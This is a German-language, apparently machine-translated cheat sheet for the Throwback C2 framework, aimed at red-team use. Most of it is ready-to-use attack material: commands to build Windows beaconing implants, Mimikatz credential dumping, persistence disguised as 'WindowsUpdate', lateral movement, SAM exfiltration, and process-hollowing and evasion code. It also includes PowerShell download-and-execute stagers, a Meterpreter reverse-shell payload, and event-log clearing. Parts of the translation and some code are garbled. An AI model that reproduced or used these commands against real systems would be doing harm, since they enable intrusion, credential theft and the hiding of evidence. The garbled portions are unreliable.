C2 Framework Cheat Sheet
Überblick
Throwback ist ein HTTP/HTTPS-Beaconing-Implantat mit einem C2-Server, der für rote Teamoperationen und Penetrationstests konzipiert ist. Entwickelt von Silent Break Security besteht es aus einem C++ Backdoor Implantat und einem PHP/MySQL-basierten Befehls- und Steuerserver. Throwback konzentriert sich auf verdeckte Kommunikation, Persistenz und Stealth Operationen mit minimalem Footprint.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation
Voraussetzungen
```bash
Install dependencies (Ubuntu/Debian)
sudo apt update sudo apt install -y apache2 mysql-server php php-mysql php-curl php-json git build-essential mingw-w64
Install cross-compilation tools for Windows
sudo apt install -y gcc-mingw-w64-x86-64 gcc-mingw-w64-i686
Start services
sudo systemctl start apache2 sudo systemctl start mysql sudo systemctl enable apache2 sudo systemctl enable mysql ```_
MySQL Setup
```sql -- Configure MySQL database sudo mysql -u root -p
CREATE DATABASE throwback; CREATE USER 'throwback'@'localhost' IDENTIFIED BY 'StrongPassword123!'; GRANT ALL PRIVILEGES ON throwback.* TO 'throwback'@'localhost'; FLUSH PRIVILEGES; EXIT; ```_
Server Installation
```bash
Clone Throwback repository
git clone https://github.com/silentbreaksec/Throwback.git cd Throwback
Set up web server directory
sudo cp -r Server/* /var/www/html/ sudo chown -R www-data:www-data /var/www/html/ sudo chmod -R 755 /var/www/html/
Configure database connection
sudo nano /var/www/html/config.php ```_
Datei konfigurieren
```php
```_
Datenbank Schema Setup
```sql -- Create database tables USE throwback;
CREATE TABLE agents ( id INT AUTO_INCREMENT PRIMARY KEY, agent_id VARCHAR(255) UNIQUE NOT NULL, hostname VARCHAR(255), username VARCHAR(255), ip_address VARCHAR(45), os_version VARCHAR(255), process_id INT, process_name VARCHAR(255), first_seen TIMESTAMP DEFAULT CURRENT_TIMESTAMP, last_seen TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, status ENUM('active', 'inactive', 'dead') DEFAULT 'active' );
CREATE TABLE tasks ( id INT AUTO_INCREMENT PRIMARY KEY, agent_id VARCHAR(255), task_id VARCHAR(255) UNIQUE NOT NULL, command TEXT, arguments TEXT, status ENUM('pending', 'sent', 'completed', 'failed') DEFAULT 'pending', created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, completed_at TIMESTAMP NULL, FOREIGN KEY (agent_id) REFERENCES agents(agent_id) );
CREATE TABLE results ( id INT AUTO_INCREMENT PRIMARY KEY, task_id VARCHAR(255), agent_id VARCHAR(255), output LONGTEXT, error_output TEXT, received_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, FOREIGN KEY (task_id) REFERENCES tasks(task_id), FOREIGN KEY (agent_id) REFERENCES agents(agent_id) );
CREATE TABLE files ( id INT AUTO_INCREMENT PRIMARY KEY, agent_id VARCHAR(255), filename VARCHAR(255), filepath TEXT, filesize BIGINT, file_hash VARCHAR(64), upload_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP, FOREIGN KEY (agent_id) REFERENCES agents(agent_id) ); ```_
Implant Compilation
Windows Implant (x64)
```bash
Compile 64-bit Windows implant
cd Implant x86_64-w64-mingw32-gcc -o throwback_x64.exe \ -DHOST=\"192.168.1.100\" \ -DPORT=80 \ -DSSL=0 \ -DINTERVAL=30 \ -DJITTER=10 \ -DKEY=\"YourSecretEncryptionKey123\" \ throwback.c \ -lws2_32 -lwininet -lcrypt32
Strip symbols for smaller size
x86_64-w64-mingw32-strip throwback_x64.exe ```_
Windows Implant (x86)
```bash
Compile 32-bit Windows implant
i686-w64-mingw32-gcc -o throwback_x86.exe \ -DHOST=\"192.168.1.100\" \ -DPORT=80 \ -DSSL=0 \ -DINTERVAL=30 \ -DJITTER=10 \ -DKEY=\"YourSecretEncryptionKey123\" \ throwback.c \ -lws2_32 -lwininet -lcrypt32
Strip symbols
i686-w64-mingw32-strip throwback_x86.exe ```_
HTTPS Implant
```bash
Compile with SSL support
x86_64-w64-mingw32-gcc -o throwback_https.exe \ -DHOST=\"secure.example.com\" \ -DPORT=443 \ -DSSL=1 \ -DINTERVAL=60 \ -DJITTER=20 \ -DKEY=\"YourSecretEncryptionKey123\" \ throwback.c \ -lws2_32 -lwininet -lcrypt32 ```_
Benutzerdefinierte erstellen Skript
```bash
!/bin/bash
build_implant.sh - Custom implant builder
HOST="192.168.1.100" PORT="80" SSL="0" INTERVAL="30" JITTER="10" KEY="YourSecretEncryptionKey123" OUTPUT_DIR="./builds"
Create output directory
mkdir -p $OUTPUT_DIR
Build x64 implant
echo "[+] Building x64 implant..." x86_64-w64-mingw32-gcc -o $OUTPUT_DIR/throwback_x64.exe \ -DHOST=\"$HOST\" \ -DPORT=$PORT \ -DSSL=$SSL \ -DINTERVAL=$INTERVAL \ -DJITTER=$JITTER \ -DKEY=\"$KEY\" \ throwback.c \ -lws2_32 -lwininet -lcrypt32
Build x86 implant
echo "[+] Building x86 implant..." i686-w64-mingw32-gcc -o $OUTPUT_DIR/throwback_x86.exe \ -DHOST=\"$HOST\" \ -DPORT=$PORT \ -DSSL=$SSL \ -DINTERVAL=$INTERVAL \ -DJITTER=$JITTER \ -DKEY=\"$KEY\" \ throwback.c \ -lws2_32 -lwininet -lcrypt32
Strip symbols
x86_64-w64-mingw32-strip $OUTPUT_DIR/throwback_x64.exe i686-w64-mingw32-strip $OUTPUT_DIR/throwback_x86.exe
echo "[+] Implants built successfully in $OUTPUT_DIR" ls -la $OUTPUT_DIR/ ```_
Web Interface
Zugriff auf die Schnittstelle
```bash
Access web interface
http://192.168.1.100/index.php
Login credentials (from config.php)
Username: admin Password: SecurePassword456!
HTTPS access (if SSL configured)
https://secure.example.com/index.php ```_
Dashboard Übersicht
| | Section | Description | | | --- | --- | | | Agents | View and manage active implants | | | | Tasks | Create and monitor tasks | | | | Results | View command execution results | | | | Files | Manage uploaded/downloaded files | | | | Logs | View system and error logs | | | | Settings | Configure C2 server settings | |
Personalmanagement
```php // View active agents GET /agents.php
// Agent details GET /agent_details.php?id=AGENT_ID
// Kill agent POST /kill_agent.php \\{ "agent_id": "AGENT_ID" \\} ```_
Ausführung des Befehls
Grundlegende Befehle
```bash
System information
whoami # Current user hostname # Computer name pwd # Current directory dir # List directory contents cd [directory] # Change directory type [file] # Read file contents
Process management
tasklist # List running processes taskkill /PID [pid] # Kill process by PID taskkill /IM [name] # Kill process by name
Network information
ipconfig /all # Network configuration netstat -an # Network connections arp -a # ARP table route print # Routing table ```_
Dateioperationen
```bash
File management
download [file] # Download file from target upload [local] [remote] # Upload file to target copy [source] [dest] # Copy file move [source] [dest] # Move file del [file] # Delete file mkdir [directory] # Create directory rmdir [directory] # Remove directory
File search
dir /s [pattern] # Search for files findstr [pattern] [file] # Search within files ```_
Register Operationen
```bash
Registry queries
reg query [key] # Query registry key reg add [key] /v [value] /d [data] # Add registry value reg delete [key] /v [value] # Delete registry value
Common registry locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg query HKLM\SYSTEM\CurrentControlSet\Services ```_
Einrichtende Operationen
```bash
Credential harvesting
mimikatz # Execute Mimikatz sekurlsa::logonpasswords # Dump logon passwords lsadump::sam # Dump SAM database lsadump::cache # Dump cached credentials
Token manipulation
whoami /priv # Check privileges whoami /groups # Check group membership ```_
Erweiterte Funktionen
Persistenzmechanismen
```bash
Registry persistence
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /d "C:\Windows\Temp\throwback.exe"
Scheduled task persistence
schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\throwback.exe" /sc onlogon
Service persistence
sc create "WindowsUpdateService" binPath= "C:\Windows\Temp\throwback.exe" start= auto sc start "WindowsUpdateService"
Startup folder persistence
copy throwback.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" ```_
Spätere Bewegung
```bash
Remote execution via WMI
wmic /node:[target] /user:[user] /password:[pass] process call create "cmd.exe /c [command]"
PSExec-style execution
net use \[target]\IPC$ /user:[user] [password] copy throwback.exe \[target]\C$\Windows\Temp\ sc \[target] create "TempService" binPath= "C:\Windows\Temp\throwback.exe" sc \[target] start "TempService"
PowerShell remoting
powershell -c "Invoke-Command -ComputerName [target] -Credential (Get-Credential) -ScriptBlock \\{[command]\\}" ```_
Daten Exfiltration
```bash
File exfiltration
download C:\Users\Administrator\Documents\sensitive.docx download C:\Windows\System32\config\SAM download C:\inetpub\logs\LogFiles\W3SVC1*.log
Database exfiltration
sqlcmd -S [server] -E -Q "SELECT * FROM sensitive_table" -o output.txt download output.txt
Registry exfiltration
reg export HKLM\SAM sam.reg download sam.reg ```_
Steganbau
```bash
Hide data in images
copy /b image.jpg + data.txt hidden.jpg upload hidden.jpg C:\Windows\Temp\wallpaper.jpg
Hide executables in legitimate files
copy /b legitimate.pdf + throwback.exe hidden.pdf ```_
Automatisierung und Schrift
PHP Automationsskript
```php
db = new mysqli($GLOBALS['servername'], $GLOBALS['username'], $GLOBALS['password'], $GLOBALS['dbname']); \\\\} public function getActiveAgents() \\\\{ $result = $this->db->query("SELECT * FROM agents WHERE status = 'active'"); return $result->fetch_all(MYSQLI_ASSOC); \\\\} public function createTask($agent_id, $command, $arguments = '') \\\\{ $task_id = uniqid('task_'); $stmt = $this->db->prepare("INSERT INTO tasks (agent_id, task_id, command, arguments) VALUES (?, ?, ?, ?)"); $stmt->bind_param("ssss", $agent_id, $task_id, $command, $arguments); return $stmt->execute(); \\\\} public function automatedRecon($agent_id) \\\\{ $commands = [ 'whoami', 'hostname', 'ipconfig /all', 'tasklist', 'netstat -an', 'dir C:\Users', 'reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' ]; foreach ($commands as $cmd) \\\\{ $this->createTask($agent_id, $cmd); sleep(2); \\\\} \\\\} public function credentialHarvesting($agent_id) \\\\{ // Check if agent has admin privileges first $this->createTask($agent_id, 'whoami', '/priv'); sleep(5); // Execute credential harvesting $this->createTask($agent_id, 'mimikatz', 'sekurlsa::logonpasswords'); $this->createTask($agent_id, 'mimikatz', 'lsadump::sam'); $this->createTask($agent_id, 'mimikatz', 'lsadump::cache'); \\\\} public function establishPersistence($agent_id) \\\\{ $persistence_commands = [ 'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /d "C:\Windows\Temp\throwback.exe"', 'schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\throwback.exe" /sc onlogon', 'copy throwback.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"' ]; foreach ($persistence_commands as $cmd) \\\\{ $this->createTask($agent_id, 'cmd', "/c $cmd"); sleep(3); \\\\} \\\\} \\\\} // Usage $automation = new ThrowbackAutomation(); $agents = $automation->getActiveAgents(); foreach ($agents as $agent) \\\\{ echo "[+] Processing agent: \\\\{$agent['agent_id']\\\\}\n"; $automation->automatedRecon($agent['agent_id']); // Wait before credential harvesting sleep(30); $automation->credentialHarvesting($agent['agent_id']); // Establish persistence $automation->establishPersistence($agent['agent_id']); \\\\} ?>```_
Python API Client
```python
!/usr/bin/env python3
throwback_client.py - Python API client for Throwback
import requests import json import time from urllib3.exceptions import InsecureRequestWarning
Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class ThrowbackClient: def init(self, base_url, username, password): self.base_url = base_url.rstrip('/') self.session = requests.Session() self.session.verify = False self.authenticate(username, password)
def authenticate(self, username, password):
"""Authenticate with Throwback server"""
auth_data = \\\\{
'username': username,
'password': password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/login.php", data=auth_data)
if response.status_code == 200 and "dashboard" in response.text.lower():
print("[+] Authentication successful")
else:
raise Exception("Authentication failed")
def get_agents(self):
"""Get list of active agents"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/agents.php")
return response.json()
def create_task(self, agent_id, command, arguments=""):
"""Create a new task for an agent"""
task_data = \\\\{
'agent_id': agent_id,
'command': command,
'arguments': arguments
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/tasks.php", data=task_data)
return response.json()
def get_task_results(self, task_id):
"""Get results for a specific task"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/results.php?task_id=\\\\{task_id\\\\}")
return response.json()
def download_file(self, agent_id, remote_path, local_path):
"""Download file from agent"""
task_data = \\\\{
'agent_id': agent_id,
'command': 'download',
'arguments': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/download.php", data=task_data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
print(f"[+] File downloaded: \\\\{local_path\\\\}")
else:
print(f"[-] Download failed: \\\\{response.text\\\\}")
def automated_recon(self, agent_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"ipconfig /all",
"tasklist",
"netstat -an",
"dir C:\\Users",
"systeminfo"
]
task_ids = []
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.create_task(agent_id, cmd)
if 'task_id' in result:
task_ids.append(result['task_id'])
time.sleep(2)
return task_ids
def wait_for_results(self, task_ids, timeout=300):
"""Wait for task results"""
start_time = time.time()
completed_tasks = []
while len(completed_tasks) ``< len(task_ids) and (time.time() - start_time) < timeout:
for task_id in task_ids:
if task_id not in completed_tasks:
results = self.get_task_results(task_id)
if results and results.get('status') == 'completed':
completed_tasks.append(task_id)
print(f"[+] Task \\\{task_id\\\} completed")
print(f"Output: \\\{results.get('output', '')\\\}")
time.sleep(5)
return completed_tasks
Usage example
if name == "main": client = ThrowbackClient("http://192.168.1.100", "admin", "SecurePassword456!")
# Get active agents
agents = client.get_agents()
print(f"[+] Found \\\{len(agents)\\\} active agents")
for agent in agents:
agent_id = agent['agent_id']
print(f"[+] Processing agent: \\\{agent_id\\\}")
# Perform reconnaissance
task_ids = client.automated_recon(agent_id)
# Wait for results
completed = client.wait_for_results(task_ids)
print(f"[+] Completed \\\{len(completed)\\\} tasks for agent \\\{agent_id\\\}")
```_
PowerShell Automation
```powershell
throwback_automation.ps1 - PowerShell automation script
function Invoke-ThrowbackAutomation \{ param( [string]$ServerURL = "http://192.168.1.100", [string]$Username = "admin", [string]$Password = "SecurePassword456!" )
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate
$authData = @\\\{
username = $Username
password = $Password
\\\}
try \\\{
$loginResponse = Invoke-WebRequest -Uri "$ServerURL/login.php" -Method POST -Body $authData -WebSession $session
if ($loginResponse.StatusCode -eq 200) \\\{
Write-Host "[+] Authentication successful"
\\\}
\\\}
catch \\\{
Write-Error "Authentication failed: $_"
return
\\\}
# Get active agents
try \\\{
$agentsResponse = Invoke-WebRequest -Uri "$ServerURL/api/agents.php" -WebSession $session
$agents = $agentsResponse.Content|ConvertFrom-Json
Write-Host "[+] Found $($agents.Count) active agents"
\\\}
catch \\\{
Write-Error "Failed to get agents: $_"
return
\\\}
# Process each agent
foreach ($agent in $agents) \\\{
Write-Host "[+] Processing agent: $($agent.agent_id)"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"ipconfig /all",
"tasklist",
"netstat -an",
"dir C:\Users",
"systeminfo"
)
foreach ($cmd in $commands) \\\{
$taskData = @\\\{
agent_id = $agent.agent_id
command = $cmd
arguments = ""
\\\}
try \\\{
$taskResponse = Invoke-WebRequest -Uri "$ServerURL/api/tasks.php" -Method POST -Body $taskData -WebSession $session
Write-Host "[+] Task created for command: $cmd"
Start-Sleep -Seconds 2
\\\}
catch \\\{
Write-Warning "Failed to create task for command '$cmd': $_"
\\\}
\\\}
# Wait before processing next agent
Start-Sleep -Seconds 10
\\\}
\}
Execute automation
Invoke-ThrowbackAutomation ```_
Evasion Techniken
Anti-Virus Evasion
```c // AV evasion techniques in implant code
// String obfuscation char obfuscated_url[] = \{0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x00\}; // "http://"
// API hashing DWORD hash_api(char api_name) \{ DWORD hash = 0; while (api_name) \{ hash = ((hash << 5) + hash) + *api_name++; \} return hash; \}
// Sleep obfuscation void obfuscated_sleep(DWORD milliseconds) \{ LARGE_INTEGER interval; interval.QuadPart = -(milliseconds * 10000LL); NtDelayExecution(FALSE, &interval;); \}
// Process hollowing BOOL process_hollowing(char target_process, char payload) \{ STARTUPINFO si = \{0\}; PROCESS_INFORMATION pi = \{0\};
// Create suspended process
if (!CreateProcess(target_process, NULL, NULL, NULL, FALSE,
CREATE_SUSPENDED, NULL, NULL, &si;, π)) \\\{
return FALSE;
\\\}
// Unmap original image
ZwUnmapViewOfSection(pi.hProcess, GetImageBase(pi.hProcess));
// Allocate memory and write payload
LPVOID base_addr = VirtualAllocEx(pi.hProcess, GetImageBase(pi.hProcess),
payload_size, MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, base_addr, payload, payload_size, NULL);
// Resume execution
ResumeThread(pi.hThread);
return TRUE;
\} ```_
Netzwerk Evasion
```c // Domain fronting implementation char fronted_domain[] = "cdn.example.com"; char real_host[] = "c2.malicious.com";
// Custom user agents char user_agents[][256] = \{ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36" \};
// Jitter implementation void jittered_sleep(DWORD base_interval, DWORD jitter_percent) \{ DWORD jitter = (base_interval * jitter_percent) / 100; DWORD min_sleep = base_interval - jitter; DWORD max_sleep = base_interval + jitter;
DWORD actual_sleep = min_sleep + (rand() % (max_sleep - min_sleep + 1));
Sleep(actual_sleep * 1000);
\}
// Traffic shaping void shape_traffic(char* data, DWORD data_size) \{ // Split large data into smaller chunks DWORD chunk_size = 1024 + (rand() % 2048); // Random chunk size DWORD chunks = (data_size + chunk_size - 1) / chunk_size;
for (DWORD i = 0; i < chunks; i++) \\\{
DWORD current_chunk_size = min(chunk_size, data_size - (i * chunk_size));
send_chunk(data + (i * chunk_size), current_chunk_size);
// Random delay between chunks
Sleep((rand() % 5000) + 1000); // 1-6 seconds
\\\}
\} ```_
Erinnerung
```c // Memory encryption void encrypt_memory(LPVOID address, SIZE_T size, BYTE key) \{ BYTE ptr = (BYTE)address; for (SIZE_T i = 0; i < size; i++) \{ ptr[i] ^= key; \} \}
// Heap encryption typedef struct \{ LPVOID original_addr; SIZE_T size; BYTE key; \} ENCRYPTED_HEAP;
ENCRYPTED_HEAP allocate_encrypted_heap(SIZE_T size) \{ ENCRYPTED_HEAP heap = malloc(sizeof(ENCRYPTED_HEAP)); heap->``original_addr = VirtualAlloc(NULL, size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE); heap->size = size; heap->key = (BYTE)(rand() % 256);
// Encrypt allocated memory
encrypt_memory(heap->original_addr, heap->size, heap->key);
return heap;
\\}
// Stack string obfuscation void obfuscated_string_copy(char dest, char src, BYTE key) \\{ while (src) \\{ dest++ = src++ ^ key; \\} dest = '\0'; \\} ```_
Integration mit anderen Tools
Metasploit Integration
```bash
Use Throwback with Metasploit
Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
Upload via Throwback
upload meterpreter.exe C:\Windows\Temp\update.exe
Execute Metasploit payload
cmd /c C:\Windows\Temp\update.exe
Handle in Metasploit
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 8443 run ```_
Integrieren der Welt
```bash
Generate Empire stager
Use Throwback for initial access, pivot to Empire
From Throwback implant
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
Handle in Empire
./empire listeners uselistener http set Host 192.168.1.100 set Port 8080 execute ```_
Cobalt Strike Integration
```bash
Beacon integration
Generate Cobalt Strike beacon
Use Throwback for initial access, pivot to Beacon
From Throwback implant
cmd /c powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
Handle in Cobalt Strike team server
```_
Operationelle Sicherheit
Kommunikationssicherheit
```bash
Use HTTPS with valid certificates
Configure domain fronting
Implement certificate pinning
Use legitimate user agents
Example HTTPS configuration
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes -subj "/C=US/ST=State/L=City/O=Organization/CN=secure.example.com"
Configure Apache for HTTPS
sudo a2enmod ssl sudo systemctl restart apache2 ```_
Verkehrsanalyse Evanation
```bash
Mimic legitimate traffic patterns
Use common HTTP methods and headers
Implement realistic timing
Blend with normal network traffic
Example legitimate traffic mimicking
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive ```_
Anti-Forensik
```bash
Clear event logs
wevtutil cl System wevtutil cl Security wevtutil cl Application
Timestomping
powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
Secure deletion
sdelete -z -s C:\Windows\Temp\ ```_
Fehlerbehebung
Gemeinsame Themen
```bash
Implant not connecting
- Check firewall rules
- Verify web server configuration
- Test network connectivity
- Check database connection
Database connection issues
Test MySQL connection
mysql -u throwback -p -h localhost throwback
Web server issues
Check Apache error logs
sudo tail -f /var/log/apache2/error.log
Check PHP errors
sudo tail -f /var/log/apache2/error.log|grep PHP ```_
Debug Mode
```php // Enable debug mode in config.php $debug_mode = true;
// Check debug logs tail -f /var/log/apache2/access.log tail -f /var/log/apache2/error.log ```_
Leistungsoptimierung
```bash
Optimize MySQL
sudo mysql_secure_installation
Optimize Apache
sudo a2enmod rewrite sudo a2enmod deflate sudo systemctl restart apache2
Monitor system resources
htop iotop netstat -tulpn ```_
Best Practices
Betriebsplanung
- *Pre-engagement Setup: Server- und Kompilierungsimplantate vor dem Eingriff konfigurieren
- ** Kommunikationsprotokolle*: Sichere C2-Kommunikationskanäle erstellen
- Datenhandling: Implementierung einer sicheren Datenerfassung und -speicherung
- *Cleanup-Verfahren: Plan zur Artefaktentfernung und Betriebsreinigung
- Teamkoordination: Zentralisierte C2 für Teamkooperation verwenden
Sicherheitsüberlegungen
```bash
Secure deployment
Use strong authentication
Enable HTTPS with valid certificates
Implement network segmentation
Regular security updates
Implant management
Use unique encryption keys
Implement kill dates
Regular implant rotation
Secure communication channels
```_
Dokumentation und Reporting
```bash
Operation documentation
Maintain detailed logs
Document all activities
Track compromised systems
Generate executive reports
Artifact tracking
Monitor IOCs
Document forensic artifacts
Implement attribution prevention
```_
Ressourcen
- Throwback GitHub Repository
- Silent Break Security Blog
- (LINK5_)
- [MITRE ATT&CK; Framework](LINK_5___ -%20(SANS%20Red%20Team%20Operations)(__LINK_5)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Throwback C2 Framework. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von roten Team-Operationen oder Penetrationstests haben. *